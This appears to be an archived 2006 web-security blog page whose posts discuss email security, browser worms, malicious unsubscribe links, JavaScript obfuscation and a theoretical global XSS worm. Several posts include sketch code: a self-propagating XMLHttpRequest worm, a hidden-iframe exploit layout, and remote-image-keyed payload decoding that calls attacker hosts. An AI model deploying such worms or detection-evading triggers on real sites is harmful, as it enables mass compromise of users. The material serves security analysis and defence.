web application security lab

Archive for the 'Anti-Virus' Category

99 Email Security Tips

Sunday, November 26th, 2006

I ran across this article today on 99 ways to secure your email. Largely it’s email etiquette and efficiency fluff; there are really only a small handful of actual ways to secure your email in it (numbers 78-99). There are a few tips I’d tell people that are definitely not mentioned on their list. Here are a few from my personal list:

1) Turn off preview panes. When you click an email and it shows up in the preview pane, you render the remote images, and the click-tracking that spammers use to verify their email lists executes. That alerts them to the fact that you a) are a real user and b) are a user who reads spam. Having your email open automatically also increases the likelihood of automatic exploitation of your email client. None of those are good, so turn off the preview pane.

2) Don’t put email addresses or sensitive corporate information into out-of-office emails. If you are out of the office, just give the name of the person to contact. If people know anything about your company they’ll know how to reach the front desk and use that name to get in touch. A number of times people have set out-of-office messages with stuff like, “If you need information on super secret project x please contact….” Firstly, that’s bad if it’s someone who doesn’t really know you (salespeople, etc…); secondly, if it contains email addresses, those too can be scraped by spammers who watch the return addresses for bounces.

3) Use DomainKeys, SPF (Sender Policy Framework) records, or other tools to reduce spoofing. If you want to let people verify that email really came from users on your domain without causing them too much grief, install DomainKeys or publish SPF records to reduce the likelihood of people successfully spoofing your email. PGP signing is great, but it only works for the one person using it, unlike DomainKeys.

4) Unlike what the article says, do NOT use Yahoo or Hotmail to send anonymous emails. Both include headers that show the recipient where you are originating from. Use something like Hushmail instead.

5) Create custom email accounts for specific applications. I’ve seen a number of people who have begun building out vanity email addresses based on the specific site they are visiting, e.g. ha.ckers.org@mysite.com. That way you know exactly which site leaked or sold the address.

6) Validate users who are allowed to send email to you. This is an ugly one, but by only allowing people whom you have authorized to email you, you can significantly reduce unsolicited email. You had better not use one of these accounts for anything you want to get electronic receipts for, but for personal accounts it’s a pretty decent solution.

7) Use a fake or modified name on each site you visit. If my name is “John Smith” I could use something like “John Petsmart Smith,” which will let me know that Petsmart has sold my email information if I get spam or phishing emails addressed to that name in the future.

Anyway, there are dozens of ways to secure your email. I’m sure everyone can contribute to this list. It’s a huge topic that they really only scratched the surface of.

Grey Goo Attacks Second Life

Monday, November 20th, 2006

I know this isn’t 100% on topic, but I really get a kick out of viral issues in social networks. In this case there is a new virus that hit Second Life and auto-replicates a particular item all over the world. Second Life is an interactive game where users can create their own land, items, etc., for actual money. Sounds like trouble to me. Mixing personal interest with untested designs is often cause for exploitation.

In this case the virus, called Grey Goo (named after the theory that a molecular self-replicating machine could destroy the earth and turn it, essentially, into grey goo), ended up taking the game down for a little while as they fixed the issue. A minor annoyance, some bad press and a few lost customers at worst. But think about how bad self-replicating code really is. There is no actual distinction between that and any genetic self-replicating organism.

The only major difference is that we are personally immune to the effects of the viruses (at least for the most part). It’s annoying, but we have out-of-band mechanisms for dealing with code. But think about a future where everything has an IP address. Something as simple as a flicker can trigger an epileptic seizure. A bug could drive your car off the road. A glitch could cause all the dams in the country to open up and flood the surrounding areas. Thankfully this grey goo scenario could be stopped by out-of-band mechanisms, but the more we automate systems in the physical world, the harder it will become to stay completely in control of the machines we build.

It’s awfully nice to have the big red panic button. Let’s just make sure we don’t automate that too.

AJAX Worm Demo Code

Sunday, October 29th, 2006

Today Anurag Agarwal posted a link to the WASC list that demonstrates a conceptual manual AJAX worm. Actually that’s sort of a misnomer, since this really just uses XMLHTTPRequest and not XML, but you get the idea. The link is benign, but what it does show is a very slowed-down and non-malicious version of an XMLHTTPRequest worm that propagates via XMLHTTPRequest only (only on Anurag’s domain and only for the files he links to).

This is an interesting take on what we’ve been talking about. Of course it’s extremely slowed down because it’s not meant to overtake anything, and it’s all manual (you can see that the URL field does not change). This is kind of interesting for cases when you can’t XSS the page you’re interested in but you are able to XSS at least one page that a user will end up clicking on.

The conceptual Warhol worms that I’ve worked on really have very few user requirements, save that the user views a page that’s under the control of the worm and has the appropriate technologies installed. But breaking it down into its core components is definitely one step toward understanding the most effective virulence methodologies. XMLHTTPRequest is definitely a technology worth thinking about, especially combined with browser bugs like Internet Explorer’s mhtml: issue et al. Any way to move from one system to another makes such a worm far more potent.
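
To make the propagation mechanic concrete, here’s a minimal sketch of my own (this is not Anurag’s actual demo code; the “page2.html” and “worm.js” names are made-up placeholders) showing how a page can pull in another same-origin page with XMLHTTPRequest and carry its own script along with it:

<SCRIPT>
// Minimal sketch of same-origin propagation via XMLHTTPRequest.
// "page2.html" and "worm.js" are hypothetical placeholders.
function propagate(nextPage) {
    var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                    : new ActiveXObject("Microsoft.XMLHTTP");
    xhr.open("GET", nextPage, true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4 && xhr.status == 200) {
            // Append a reference to our own code to the fetched page and
            // render it in place; the script tag is split so the HTML parser
            // doesn't close this block early. A real worm would also try to
            // write the result back to the server.
            var infected = xhr.responseText +
                "<scr" + "ipt src='worm.js'></scr" + "ipt>";
            document.open();
            document.write(infected);
            document.close();
        }
    };
    xhr.send(null);
}
propagate("page2.html");
</SCRIPT>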

Email Risks

Thursday, August 31st, 2006

There’s an interesting link over at Network Blog talking about a survey of a number of office workers who were completely unaware of the risks involved with email security. Namely, most of the users interviewed were happy to open any email they got and, even worse, click on links regardless of who sent them.

They then link to an article at Application Security Blog that discusses how web bugs work in the context of email. Email clients are becoming more resistant to this trick nowadays because they now ask whether users would like to download images. Of course there are ways to circumvent those security measures (consumers prefer convenience and will turn almost any security measure off if they don’t understand how it’s protecting them).
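
For reference, a web bug is usually nothing more than a tiny remote image whose URL carries a unique identifier; the tracking host and token below are made up for illustration:

<!-- A 1x1 remote image: fetching it tells the sender which recipient
     opened the email, and when. Host and token are hypothetical. -->
<IMG SRC="http://tracker.example.com/pixel.gif?id=recipient-12345" WIDTH="1" HEIGHT="1">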

As we’ve seen, malware is pretty prevalent these days (at least 1/10th of the spam I get has .zip or .scr or other horrible attachments). Of course this goes beyond the realm of Outlook, Lotus and Thunderbird to the realm of Yahoo Mail, Hotmail and Gmail. Scanning attachments for viruses is one free service that a lot of these webmail clients offer, but it certainly doesn’t offer security from zero-day exploits - so one-off targeted attacks will always be possible. And of course there are phishing aspects, or simply links that lead to malicious websites with all sorts of consequences (like the unsubscribe link and the JavaScript port scanner).

Email is a pretty scary medium these days. Part of the problem is that email clients and web browsers are becoming more full-featured as user demand for functionality rises. These issues are only partially under control at the moment, and the interaction between pieces of software is becoming more and more complex, opening more and more vectors as a result. The fact that email can call out to the web is an issue, but there are tons of other applications that are starting to do the same (even things as obscure as online games). It will be interesting to watch these vectors morph as user interest in the mediums shifts. Instant messaging is a great example as it gradually overtakes email in popularity and becomes more and more feature rich.

Unsubscribe Link Malware

Wednesday, August 30th, 2006

Phaithful sent me an interesting bit of what looks at first glance to be spam. Normally I don’t care much about this stuff, but this was actually fairly interesting, as it uses social engineering to get users to click an unsubscribe link (something I typically don’t do, since that is a way for spammers to verify that your address is valid). Upon clicking the unsubscribe link you are taken to a page with four embedded iframes. Those iframes run a series of JavaScripts that attempt various exploits (one of the files was named metasploit.exe… so that should give you an idea).

Proceed to this URL with extreme caution, it is definitely not benign.
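
The general shape of a page like that (not the actual one - the URLs below are made up) is just a handful of invisible iframes, each pulling in its own exploit attempt in the background:

<!-- Hypothetical structure only; these URLs do not point at the real page. -->
<IFRAME SRC="http://badsite.example.com/exploit1.html" WIDTH="0" HEIGHT="0" FRAMEBORDER="0"></IFRAME>
<IFRAME SRC="http://badsite.example.com/exploit2.html" WIDTH="0" HEIGHT="0" FRAMEBORDER="0"></IFRAME>
<IFRAME SRC="http://badsite.example.com/exploit3.html" WIDTH="0" HEIGHT="0" FRAMEBORDER="0"></IFRAME>
<IFRAME SRC="http://badsite.example.com/exploit4.html" WIDTH="0" HEIGHT="0" FRAMEBORDER="0"></IFRAME>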

It always is interesting to see a shift in tactics though. Using obfuscated JavaScript is not new. Embedding malware into pages isn’t new either. But what is new is using an unsubscribe link to sucker people into visiting the page in the first place. Yet another reason not to click on unsubscribe links. I guess the CAN-SPAM Act is the newest tool in the virus writer’s toolkit. Educating users that unsubscribe links must be present and functional is just another tool in the arsenal now.

Yet Another Remote Shell

Tuesday, August 29th, 2006

Here’s another one of the failed attacks on ha.ckers.org. I copied the file in case anyone wants to do forensics on it. It’s located here. The odd part is that it is a .gif file. I’m not sure what filter they were attempting to evade by renaming the file, but it didn’t do much.

Is anyone cataloguing this stuff? Should I continue to post it? If not I’ll save myself the trouble, but I wanted to keep it here for any of the AV guys who visit the site. They may get more out of this stuff than other people.

De-Obfuscation Woes

Tuesday, August 1st, 2006

I ran into an interesting article on SANS that I think proves an interesting point about the next generation of JavaScript malware: browser-dependent and self-dependent decoding. The article explains two techniques the malware author uses to return different values depending on how you attempt to dump the code in a visible way, as well as on the browser you use. It’s a very interesting read, both because it seems to be the first time the SANS guys have done this, and because it describes in pretty good detail the de-obfuscation issues they ran into themselves.

I too use nearly the exact same methodology as the author does. Unfortunately there is no good tool that I have come across, like a JavaScript decompiler, that would have completely obviated this issue. The closest I’ve come across is a decompiler that is based on having no DOM whatsoever (not particularly useful when we are talking about a web page). It would be interesting to have such a tool, though, because it would make it possible to traverse a JavaScript function without worrying about it actually executing without warning. Sure, you can do other things like watch the HTTP traffic in transit (easy enough to do), but that may not be enough information (perhaps it calls different sites at different times of day, or based on your browser type, or your screen width, or any of hundreds of other variables).

Of course a decompiler would have similar issues, because it would still only follow a specific path based on the variables you had on hand, so perhaps that’s not the best way to do it. Another possibility is measuring relative entropy. If a JavaScript function has high entropy, it could be considered untrustworthy. Of course, the malware author could then pad the code with a lot of nulls or whitespace or other characters to be stripped, which would bring the entropy down to much lower levels. All of these ideas probably need a lot more thought, but JavaScript is really beginning to show how obfuscation makes straight detection much harder.
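
For what it’s worth, the entropy idea is easy to prototype. Here’s a rough sketch of my own (not a real detector; the threshold is an arbitrary guess) that computes the Shannon entropy of a script’s source in bits per character:

<SCRIPT>
// Rough sketch only: Shannon entropy of a string, in bits per character.
function shannonEntropy(code) {
    var counts = {}, i, c, p, entropy = 0;
    for (i = 0; i < code.length; i++) {
        c = code.charAt(i);
        counts[c] = (counts[c] || 0) + 1;
    }
    for (c in counts) {
        p = counts[c] / code.length;
        entropy -= p * Math.log(p) / Math.log(2);
    }
    return entropy;
}

// The 5.5 bits/char cutoff is arbitrary; as noted above, padding the code
// with whitespace or nulls drags the score right back down.
function looksObfuscated(code) {
    return shannonEntropy(code) > 5.5;
}
</SCRIPT>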

Fake Google Toolbar

Monday, July 31st, 2006

Well, it was just a matter of time, but there are finally some reports of a fake Google Toolbar executable that hides a trojan horse. Great! Well, I always knew it would happen, and I’ve been warning people for ages: “If you put executables on your webpage, it’s just a matter of time before the phishers do the same thing.” Thankfully the barrier to entry in building executables is still fairly high, making this a fairly small attack vector, but used in combination with hijacking a big DNS server it could be huge. Think about what a fake Microsoft Windows Update could do in terms of numbers!

This probably falls into the pharming category rather than phishing, as it doesn’t directly try to compromise you by asking for information, but it does try to get you to download something based on a brand you are supposed to trust. To my knowledge this is the first time this has ever happened. Getting someone to install this toolbar could lead not only to information loss but also to more phishing, because the anti-phishing protection built into the real Google Toolbar will obviously be absent. Pretty nasty. Executables are pretty nasty.

I’m still waiting for the day when there is a single signing authority for executables so you can know what is real and what isn’t. The Google Toolbar should be signed by a central authority, and your machine shouldn’t even let you download it unless you know where it comes from and can verify that. That might be a pipe dream, and it would kill a lot of the little guys, but if it at least warned you that the download wasn’t signed, that might give people a clue that it wasn’t Google. Either that or they’d just click through. This is frustrating, because there isn’t really a good answer, other than better detection of fraudulent websites claiming to be big brands.

Cross Site Scripting Warhol Worm

Friday, July 28th, 2006

Several years ago I read a paper called Owning the Internet in Your Spare Time. Besides being the single best security paper I’ve ever read coming out of a college, it opens the door to a new classification of viral propagation in the security community. The basic premise is this: traditional viruses travel in a very inefficient manner. They scan a series of hosts either near their own netblock, or they just start at a single point in the entire IP space and scan in one direction. Then when they find a vulnerable host they infect it and start scanning from the same place all over again. As I said, super inefficient. The concept of a Warhol worm comes from what Andy Warhol was famous for - “15 minutes of fame” - a virus that could propagate globally in 15 minutes.

Now in spite of the great premise of the paper above, it still lacks some reality (in talking with some viral genetics researchers). There are two things that make this paper infeasible. The first is that it requires users to have their computers on. Typically that is a follow-the-sun model. The fastest you can get a worm to travel is slightly less than the time it takes for every computer on the planet to turn on and be infected (approximately 24 hours). The other problem is network traffic. If you have every machine in the world probing for computers, it can take down huge sections of the network, so you have to have some mitigating factors to make sure only high-bandwidth hosts are capable of scanning large chunks of the network, and hosts stay relatively geographically close to their origin until the next time zone is awake. The first example of a Warhol worm (or flash worm) was the SQL Slammer worm, which used a pseudo-random number generator for propagation.
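
As an aside, pseudo-random target selection is trivial to sketch. This toy illustration is not Slammer’s actual code; the seed is arbitrary and the constants are just the classic ones from Microsoft’s C runtime rand(). It shows a linear congruential generator walking the IPv4 space in a scattered order instead of scanning sequentially:

<SCRIPT>
// Toy pseudo-random target selection, for illustration only.
var state = 12345;  // arbitrary seed
function nextRandom32() {
    // Linear congruential generator, modulo 2^32
    state = (state * 214013 + 2531011) >>> 0;
    return state;
}
function nextTargetIP() {
    var n = nextRandom32();
    return ((n >>> 24) & 255) + "." + ((n >>> 16) & 255) + "." +
           ((n >>> 8) & 255) + "." + (n & 255);
}
</SCRIPT>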

So assuming you could figure these issues out (they aren’t that difficult - but I’ll leave that as an academic exercise), how does this affect cross site scripting (XSS)? Let’s take a look at the MySpace Samy worm for a second. That affected 1MM users, in a fairly non-diverse location (mostly users in the United States). 1MM users is a LOT of infected machines, but still not enough. Let’s take it one step further. Let’s pretend for a second that there are users who have accounts on multiple websites similar to MySpace (it stands to reason that if a user is accessing MySpace they probably have other accounts elsewhere as well). Finding vulnerabilities in multiple platforms should be relatively easy (it has been historically, anyway).

Now let’s say that instead of simply attacking MySpace, the worm also attacks MyYearBook.com or another similar social networking site with a significant number of users. Suddenly you have an XSS worm that can jump from platform to platform. Now let’s take it one step further, and say you find multiple vulnerabilities in social networking platforms located in every time zone around the world. If you tie them together you now have a social networking XSS worm that can leap from platform to platform and infect huge chunks of the global population. Now, let’s take it still one step further and say that we can embed certain exploits for known open source applications like PHP-Nuke, etc… Scanning the local IP space, using a search engine with keywords that match a likely candidate for exploit, then connecting the browser to it and attempting to exploit the vulnerabilities could make a worm that could theoretically attack nearly every computer on the internet that is used by a web-browsing user.

Instead of affecting 1MM users it could be 1 billion users, and it wouldn’t need much genetic diversity to do that, because it would only have to survive for one day. The ramifications of a worm like that propagating across the internet could be disastrous. The payload could be something as easy as a DDoS, or the largest phishing platform mankind has ever seen, or even as stupid as just flooding the global network for a day (anyone need a vacation day?). Critical infrastructure could not handle additional billions of requests a day (and I doubt the search engines themselves could handle the billions of additional searches being performed), which could easily flood off tons of networks, particularly the smaller ones, even with no payload. The cost to businesses could be in the billions.

It might not be 15 minutes of fame, but 24 hours of infamy is probably just as scary. I’m really trying to hold back on my fear-mongering, but this isn’t fiction - it just hasn’t been built (yet).

Remote Execution of XSS Malware

Friday, July 21st, 2006

One of the main problems with detecting cross site scripting (XSS) is that it is not an easy feat to traverse the document object model (DOM). Rendering engines are slow, and they are processor intensive. But let’s just suspend disbelief for a second and say that we could do exactly that. On every new submission to every form, let’s pretend we had enough processor time to execute each submission once and see the results before it was sent to the browser, looking for anything that might denote something malicious from a web application security perspective.

That would be great, in theory! I could suddenly remove obfuscation (the entire reason for the XSS Cheat Sheet) as an attack vector, because I could detect any possible variant, just by watching the DOM execute. Pretty slick, right? Well, no. Even setting aside for a second the problem mentioned above with processing power, there are other troubling issues with this.

The first is timed functions, or remote execution. The problem with JavaScript from a detection and parsing standpoint is that it is a full-fledged language that supports all sorts of interesting things. One of those interesting things is the ability to pull in remote information and do analysis on it. Let’s say I set up a JavaScript function specifically to pull in a remote image (from a server I have at least partial control over). If the image is over a certain height or width, or the combination is just right, the JavaScript will execute malware. If you get really tricky you can use a combination of sized images as a decoding key for some enciphered piece of code. Here’s an example:


<SCRIPT>
// Load a remote image the attacker controls; the check runs only after
// the image has loaded, so the trigger depends on its current dimensions.
var image_1 = new Image();
image_1.onload = function () {
    if (image_1.width > 1) {
        // Execute malware
    }
};
image_1.src = "http://ha.ckers.org/images/kcpimp.jpg";
</SCRIPT>

Now, that pretty much puts to rest the notion that you could traverse the DOM and get the same results as the user will (once I switch the images out). So if I know you are going to scan my block of code prior to letting it get posted, I can simply leave the benign image in place until that grace period is over. When I’m convinced that you won’t be scanning it any further, I’ll change the images out, and the code will execute for all future users, until I either change it back or the code is removed.

There is still one other problem, which is that you have to pick a rendering engine to do this with. You’re now saying, “Well, of course you do! That’s a stupid thing to say!” Well, which one would you pick? IE seems to have the most vectors that affect it and the highest penetration, so that would seem to be the obvious choice, but are you going to allow the Gecko (Firefox) only vectors to go through - thereby allowing double-digit percentages of users to be infected by the malware? Tough choice, and certainly not bulletproof.

The remote execution issue is the biggest in my mind, though. Because the attack is now controlled by a remote resource (an image or series of images), even decrypting it is out of the analyst’s hands if I so choose. Typically JavaScript is very easy to de-obfuscate if you have the human eyes and the time to do it, but in this case, if the images aren’t there or are different sizes, the decryption is meaningless. And even if you could scan every single input, you’d still be at the mercy of a timed function where the image changes after a certain point.
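
To make the decoding-key idea concrete, here’s a rough sketch of my own (the URLs and the encoded bytes are placeholders, not anything from a real attack) where the widths of remote, attacker-controlled images form an XOR key:

<SCRIPT>
// Sketch only: image widths as an XOR decoding key. Until the attacker
// swaps in images with the right widths, "decoded" is just garbage.
var keySources = ["http://attacker.example.com/k1.gif",
                  "http://attacker.example.com/k2.gif"];
var keyImages = [], loaded = 0;

function decodeAndRun() {
    var encoded = [30, 12, 7];  // placeholder bytes, not a real payload
    var decoded = "";
    for (var i = 0; i < encoded.length; i++) {
        decoded += String.fromCharCode(
            encoded[i] ^ keyImages[i % keyImages.length].width);
    }
    // eval(decoded);  // only meaningful once the key images have the right sizes
}

for (var i = 0; i < keySources.length; i++) {
    keyImages[i] = new Image();
    keyImages[i].onload = function () {
        if (++loaded == keySources.length) decodeAndRun();
    };
    keyImages[i].src = keySources[i];
}
</SCRIPT>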

This could give a central command and control aspect to XSS worms, where the central image controls the timing function, so as to keep the attack under wraps until the timing is right. This would be particularly effective in DoS attacks. The downside is that the single command and control point is easy to remove - unlike self-sufficient viral code, which depends on nothing but itself and the machine for propagation, and the originating page for roots to continue growth.